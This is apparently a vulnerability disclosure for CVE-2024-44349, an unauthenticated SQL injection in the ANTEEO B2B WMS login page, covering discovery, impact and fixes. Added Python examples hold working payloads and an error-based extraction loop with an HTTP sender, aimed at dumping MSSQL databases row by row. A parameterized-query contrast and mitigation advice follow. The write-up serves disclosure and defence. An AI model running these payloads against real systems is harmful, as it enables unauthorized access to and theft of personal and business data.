Analysis on a new vulnerability: CVE-2024-44349
Abstract
During a black-box penetration test, we encountered an SQL injection vulnerability in a warehouse management system that allowed unauthorized access to sensitive information. Upon identifying the issue, we promptly informed the relevant parties and initiated a formal coordinated-disclosure process through recognized security channels, which resulted in the assignment of a CVE. This article describes the steps taken to identify and assess the risk, and the broader implications of such security weaknesses.
CVE Introduction
We refer to the OWASP framework when conducting Web Penetration Tests for clients. According to OWASP, SQL injection (SQLi) is defined as follows: “A SQL injection attack consists of the insertion or ‘injection’ of a SQL query via input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a file from the DBMS file system, and in some cases, issue commands to the operating system.”
The discovered CVE is critical for companies using the affected WMS for the following reasons:
Privilege escalation: an unauthenticated attacker can execute SQL statements directly against the database underlying the web application, with the permissions of the application's own database account, without first obtaining a WMS login.
Network-based attack vector: the vulnerability is exploitable remotely over the network, so it is reachable from anywhere the login page is exposed.
Credential exploitation: with sufficient effort and the right conditions, an attacker can discover or create valid user credentials through the injection and thereby gain access to the web application itself.
This vulnerability severely compromises all three properties of the CIA triad (Confidentiality, Integrity and Availability), the core principle of cybersecurity. Additionally, since the affected companies fall under EU regulation, they must comply with the GDPR. If a threat actor exploits this vulnerability to extract personal data, the company using the software, as data controller, must notify the competent Data Protection Authority without undue delay (Article 33 GDPR, within 72 hours where feasible), and the vendor, where it processes that data on the controller's behalf, must notify the controller without undue delay.
Description
Organizations using ANTEEO B2B WMS Software versions 4.7.x up to (but excluding) v4.7.34 are vulnerable to CVE-2024-44349, putting their data at significant risk. Below is an analysis of how this vulnerability impacts the core principles of the CIA triad:
Confidentiality: This vulnerability compromises confidentiality, as it allows unauthorized users to read database content by executing SELECT queries without authentication or elevated permissions.
Integrity: The vulnerability was identified in a production environment, which limited the scope of our testing. Based on our findings, however, it is highly likely that UPDATE and INSERT statements can be executed through the same injection point to modify data. We did not test DELETE because of the sensitive state of the production environment, but it remains a potential risk.
Availability: Attackers can degrade availability by injecting deliberately slow or resource-intensive statements. On Microsoft SQL Server, the backend identified below, WAITFOR DELAY plays the role that SLEEP plays on MySQL; enough concurrent requests carrying such a payload tie up the application's database connections and worker threads, leading to a denial of service (DoS).
Additionally, through SQL queries an attacker can not only access data directly related to the software but also extract information about the underlying infrastructure hosting the application.
To exploit the SQL injection vulnerability we used error-based SQLi, since query results were not reflected directly in the response. As PortSwigger explains: “Error-based SQL injection refers to cases where you’re able to use error messages to either extract or infer sensitive data from the database, even in blind contexts. The possibilities depend on the configuration of the database and the types of errors you’re able to trigger.”
Analysis
This section outlines the techniques used to exploit the SQL injection vulnerability. We began by probing the username field with special characters:
Entering a single quote (') in the username field triggered an SQL exception in the response: “Incorrect syntax near ‘SELECT’.” An unhandled database syntax error caused by a single character confirmed that the field's content is concatenated into a SQL query without escaping, i.e. that the field is vulnerable to SQL injection (SQLi).
Given that this is a login portal, we hypothesized that the underlying SQL query might resemble something like this:
To exploit the SQL injection, we focused on manipulating the $username_field. Our first attempt to bypass authentication used the following string:
We entered admin'--, which is intended to close the string literal and comment out the remainder of the query, so that the password check is never evaluated and the application logs us in as the admin user. However, this only resulted in an error.
We also tested several common usernames (such as Administrator and superuser) but received the same output for each request. Because of the risk of causing a denial of service (DoS) in the production environment, we limited the number of login attempts and shifted our focus to extracting information from the database. To dump data we used a UNION SELECT query, which requires knowing the number of columns returned by the original SELECT statement. Unfortunately, we do not have screenshots of this process; iterative testing, however, revealed that the query returns three columns.
Here’s an example of how we identified this:
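The following is an added example, not the page's own code or screenshots, of the iterative technique described above: ORDER BY n probes find the largest n the original SELECT tolerates, and UNION SELECT NULL,... cross-checks the count. The oracle is any callable that says whether a payload produced a SQL error; FakeTarget is a constructed stand-in that behaves like a three-column SELECT so the block runs offline, and the `-- ` comment terminator is the MSSQL form.

```python
import re
from typing import Callable, List


def order_by_payloads(max_cols: int = 20) -> List[str]:
    """ORDER BY n fails as soon as n exceeds the number of columns in the original SELECT."""
    return [f"' ORDER BY {n}-- " for n in range(1, max_cols + 1)]


def union_payload(cols: int) -> str:
    """NULL is compatible with every column type, so only the count has to match."""
    return "' UNION SELECT " + ",".join(["NULL"] * cols) + "-- "


def find_column_count(errors: Callable[[str], bool], max_cols: int = 20) -> int:
    """Infer the column count from an oracle that reports whether a payload caused a SQL error.

    Returns 0 when the count is undetermined: either every ORDER BY up to max_cols
    succeeded, or the UNION SELECT cross-check disagrees with the ORDER BY result.
    """
    count = 0
    for n, payload in enumerate(order_by_payloads(max_cols), start=1):
        if errors(payload):
            break
        count = n
    if count == 0 or count == max_cols:
        return 0
    # Cross-check: UNION with `count` NULLs must succeed and with one more must fail
    if not errors(union_payload(count)) and errors(union_payload(count + 1)):
        return count
    return 0


class FakeTarget:
    """Constructed stand-in for the login endpoint, behaving like a SELECT with N columns."""

    def __init__(self, columns: int = 3):
        self.columns = columns

    def errors(self, payload: str) -> bool:
        m = re.search(r"ORDER BY (\d+)", payload)
        if m:
            return int(m.group(1)) > self.columns
        m = re.search(r"UNION SELECT ((?:NULL,?)+)", payload)
        if m:
            return m.group(1).count("NULL") != self.columns
        return payload.count("'") % 2 == 1  # an unbalanced quote alone is a syntax error


if __name__ == "__main__":
    print(find_column_count(FakeTarget().errors))  # 3
```

On the real target the oracle would classify the HTTP response (error modal present or not) instead of parsing the payload; the probing order matters in production, since each ORDER BY request is cheap while a mismatched UNION is the one that produces the loud error.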
Next, we focused on identifying the DBMS behind ANTEEO WMS. To do this, we examined one of the POST requests captured with a web proxy such as Caido or Burp Suite.
The POST requests showed that the web application runs on ASP.NET AJAX, which suggested Microsoft SQL Server as the database. To confirm this, we executed the following query:
The query casts a string containing the MSSQL version information to an integer. The conversion necessarily fails, and SQL Server's conversion error message echoes the offending string, so the exception displayed in the web page's modal revealed the version text.
With this simple query, we confirmed the following information about the system running ANTEEO WMS:
- Database: Microsoft SQL Server 2019, version 15.0.216.2
- Operating System: Windows Server 2022, version 10.0
Based on this, we developed a Proof of Concept (PoC), which can be viewed on GitHub PoC CVE-2024-44349, to facilitate further testing and enumeration. Below is an example from the code, demonstrating how the PoC sends the SQL query:
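As an added example (not the published PoC and not the vendor's code), the block below shows the mechanics behind both the version probe of the preceding paragraphs and the enumeration loop a PoC of this kind sends: CAST((subquery) AS INT) fails on any non-numeric string, and SQL Server's conversion error quotes the value it could not convert, so one row per request can be read out of the error text shown in the page. The endpoint URL and form field names in send_http are assumptions to be replaced with the values from the captured POST request; FakeServer is a constructed stand-in with three databases so the block runs offline.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, List, Optional

# Wording of SQL Server's type-conversion error, which quotes the value it could not convert
CONVERSION_RE = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int",
    re.S,
)


def error_payload(expr: str) -> str:
    """Username value that makes the server evaluate `expr` and leak it in a conversion error."""
    return f"' AND 1=CAST(({expr}) AS INT)-- "


def next_row_expr(table: str, column: str, known: List[str]) -> str:
    """TOP 1 plus an exclusion list walks a result set one row per request."""
    skip = ",".join("'" + k.replace("'", "''") + "'" for k in known)
    where = f" WHERE {column} NOT IN ({skip})" if skip else ""
    return f"SELECT TOP 1 {column} FROM {table}{where}"


def leaked_value(html: str) -> Optional[str]:
    """Pull the quoted value out of the conversion error, or None if the page shows no error."""
    m = CONVERSION_RE.search(html)
    return m.group(1) if m else None


def version(send: Callable[[str], str]) -> Optional[str]:
    return leaked_value(send(error_payload("SELECT @@version")))


def enumerate_column(send: Callable[[str], str], table: str, column: str,
                     limit: int = 200) -> List[str]:
    """Return every distinct value of `column` in `table`, one request per row."""
    found: List[str] = []
    while len(found) < limit:
        value = leaked_value(send(error_payload(next_row_expr(table, column, found))))
        if value is None or value in found:  # CAST(NULL AS INT) raises no error: set exhausted
            break
        found.append(value)
    return found


def send_http(username_payload: str,
              url: str = "https://wms.example.invalid/Login.aspx",  # assumed endpoint
              field: str = "txtUsername") -> str:                  # assumed form field
    """Transport against a live target; URL and field names are placeholders to adjust."""
    body = urllib.parse.urlencode({field: username_payload, "txtPassword": "x"}).encode()
    req = urllib.request.Request(url, data=body)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


class FakeServer:
    """Constructed stand-in for the vulnerable login page, used so the block runs offline."""
    databases = ["master", "tempdb", "WMS_PROD"]
    version_string = "Microsoft SQL Server (constructed sample) on Windows Server (constructed sample)"

    def send(self, username_payload: str) -> str:
        m = re.search(r"CAST\(\((.*)\) AS INT\)", username_payload)
        expr = m.group(1) if m else ""
        value = None
        if "@@version" in expr:
            value = self.version_string
        elif "sysdatabases" in expr:
            known = re.findall(r"'([^']*)'", expr)
            value = next((d for d in self.databases if d not in known), None)
        if value is None:
            return "<html><body>Login failed.</body></html>"
        return ("<div class='modal'>Conversion failed when converting the nvarchar value "
                f"'{value}' to data type int.</div>")


if __name__ == "__main__":
    fake = FakeServer()
    print(version(fake.send))
    print(enumerate_column(fake.send, "master..sysdatabases", "name"))
```

The same loop enumerates tables (sys.tables), columns (sys.columns) and finally row contents by changing only the table and column arguments, which is why error-based extraction scales to the full inventory listed in the next section even though each request leaks a single value.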
Risk/Impact Assessment
Due to confidentiality concerns, we cannot disclose the specific data extracted by the PoC. However, we were able to enumerate the following:
- Databases present on the server
- Tables and views within each database
- Columns of each accessible table
- Contents of the accessible tables
- Information regarding the domain, service accounts, and host used by the company hosting the software
By exploiting this vulnerability, malicious actors could potentially access sensitive information, including user credentials and password hashes, which could lead to further compromise of the affected systems.
Mitigation Strategies
The root cause of SQL injection is query text assembled by concatenating user input. The primary fix is to use parameterized queries (prepared statements) or a vetted ORM for every database call, so that input is always passed as data and never becomes part of the SQL grammar; in ASP.NET this means SqlParameter objects rather than string concatenation. Thorough input validation (length, character set, format) is a valuable second layer, but it cannot be relied on alone: the probe above needed only a single quote to reach the query.

Detective controls complement the fix. Intrusion Detection and Prevention Systems (IDS/IPS) can flag and block common SQL injection patterns in real time, and ingesting application and database logs into a Security Information and Event Management (SIEM) system allows the Security Operations Center (SOC) to identify enumeration attempts, for example bursts of failed logins whose username contains quotes, comment sequences or CAST/UNION keywords, or a spike in SQL Server conversion errors.

To limit the damage of a successful attack, the application's database account should hold only the minimum permissions it needs: read and write on the application's own tables, no sysadmin role, no access to other databases, and no xp_cmdshell. This directly reduces what an attacker can enumerate through this vulnerability.

We strongly recommend updating the system to the latest version, which contains the patch. If updating is not immediately feasible, place the application behind a Web Application Firewall (WAF) with SQL injection rules enabled and restrict external access to the login page as much as possible to limit the attack surface.
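As an added example that is not the vendor's code, the block below puts a plausible shape for the login query hypothesized in the Analysis section (assumed here, with the three columns the UNION probing reported) next to the parameterized form recommended above. sqlite3 stands in for SQL Server so the block runs offline, the users table and its one account are constructed, and the password hashing scheme is a placeholder. It shows why the single-quote probe raises a syntax error, why admin'-- would bypass the password check against such a query, and that neither has any effect once the values travel as parameters.

```python
import hashlib
import sqlite3
from typing import Optional, Tuple


def pwhash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()  # placeholder scheme, not the WMS's


def make_db() -> sqlite3.Connection:
    """Constructed users table with a single administrator account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?, 'administrator')",
                 (pwhash("correct horse"),))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Query text built by concatenation: the username becomes part of the SQL grammar."""
    query = ("SELECT id, username, role FROM users WHERE username = '" + username
             + "' AND pwhash = '" + pwhash(password) + "'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Parameterized query: the driver passes the values separately from the SQL text."""
    query = "SELECT id, username, role FROM users WHERE username = ? AND pwhash = ?"
    return conn.execute(query, (username, pwhash(password))).fetchone()


def probe(conn: sqlite3.Connection, username: str) -> str:
    """Classify what the vulnerable query does with a username: 'error', 'row' or 'none'."""
    try:
        return "row" if login_vulnerable(conn, username, "x") else "none"
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "'"))                              # error: the single-quote probe
    print(probe(db, "admin'-- "))                      # row: the comment removes the password check
    print(login_safe(db, "admin'-- ", "x"))            # None: the payload is just a username string
    print(login_safe(db, "admin", "correct horse"))    # (1, 'admin', 'administrator')
```

The page reports that admin'-- produced an error rather than a login on the real target, so the production query evidently differs from this assumed shape; the contrast still holds, because the parameterized version is immune regardless of how the surrounding query is written.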
After our notification, the vendor promptly patched the issue in version 4.7.34. We nevertheless recommend upgrading to version 5.0 for the additional protections it provides.
Conclusion
In this report, we outlined the process by which we discovered and exploited a critical vulnerability in the ANTEEO B2B WMS software. Following our findings, we submitted a request to MITRE, which resulted in the assignment of CVE-2024-44349. The vulnerability allows threat actors to inject SQL via the username parameter and thereby read sensitive data from the underlying database. It affects versions 4.7.x of ANTEEO B2B WMS up to, but excluding, 4.7.34. CVE-2024-44349 represents a significant security risk and, if exploited, could lead to unauthorized data access and system compromise. Organizations running affected versions should prioritize patching, enhance monitoring of the login endpoint, and apply the security practices described above to mitigate the risk and protect against future threats.